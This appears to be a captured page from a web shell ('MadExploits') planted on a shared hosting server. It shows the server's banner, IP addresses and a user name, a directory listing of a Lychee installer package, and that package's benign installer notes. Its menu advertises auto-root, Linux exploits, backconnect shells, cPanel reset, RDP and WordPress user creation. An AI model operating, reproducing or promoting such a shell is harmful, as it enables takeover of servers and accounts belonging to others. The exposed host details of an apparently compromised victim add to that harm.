Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
lychee /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
11.07
KB
-rw-r--r--
.htaccess
313
B
-rw-r--r--
_clone.php
2.9
KB
-rw-r--r--
_edit.php
4.53
KB
-rw-r--r--
_edit.xml
433
B
-rw-r--r--
changelog.txt
2.5
KB
-rw-r--r--
extend.php
9.91
KB
-rw-r--r--
fileindex.php
226
B
-rw-r--r--
import.php
4.04
KB
-rw-r--r--
info.xml
4.65
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.56
KB
-rw-r--r--
install.xml
448
B
-rw-r--r--
lychee.sql
128.5
KB
-rw-r--r--
lychee.zip
40.82
MB
-rw-r--r--
md5
2.75
KB
-rw-r--r--
notes.txt
1.96
KB
-rw-r--r--
update_pass.php
612
B
-rw-r--r--
upgrade.php
3.56
KB
-rw-r--r--
upgrade.xml
574
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. PHP REQUIREMENT LINK : https://lycheeorg.dev/docs/#server-requirements 2. Installer is at http://{{URL}}/public 3. Upgrade is disabled as user name and password are reset after upgrade due to major structural changes from 3.1 to 3.2. Mentioned here: https://github.com/LycheeOrg/Lychee/issues/278 Provide upgrade in next release as upgrade is possible from 3.2.x to 3.2.x 4. Comment security policy header in .htaccess in our zip i.e Header set Content-Security-Policy "default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'; connect-src 'self' https://lycheeorg.github.io; form-action 'none'; base-uri 'none'; frame-ancestors 'none'; upgrade-insecure-requests; block-all-mixed-content;" . This is needed to install the script on non https servers.(Needed while manual installation as well). Mentioned here : https://lycheeorg.github.io/docs/ 5. Upgrade method https://lycheeorg.dev/docs/update.html#update-manually 6. We have enabled upgrade from 4.0.x versions. 7. Upgrade from 4.5.3 to 4.6.0 was checked but kept disabled due to 500 HttpException Undefined variable $locale (View: /{{PATH}}/resources/views/gallery.blade.php). Add upgrade once this is resolved. 8. Important note : Keep 'csp' => ['enable' => false in config/secure-headers.php in our zip package(default is true). We do this because logs are not visible in admin panel if csp is enabled. https://github.com/LycheeOrg/Lychee/issues/1884 (Checked and not required anymore. No error is thrown even if the default is true) 9. Changelog: https://lycheeorg.dev/docs/releases.html 10. In .env keep double quotes in "[[softdbpass]]" and keep APP_URL and APP_DIR as we do. 11. Since 7.1.x Lychee UI installer doesn't start on its own, Hence we first rename env.example to .env and fill the database details and run following command. php artisan key:generate php artisan migrate After this we can access URL/public and create the admin user. 12. Enabled upgrade from 4.7.0 as below that the upgrader throw error. (Point No.7)
Close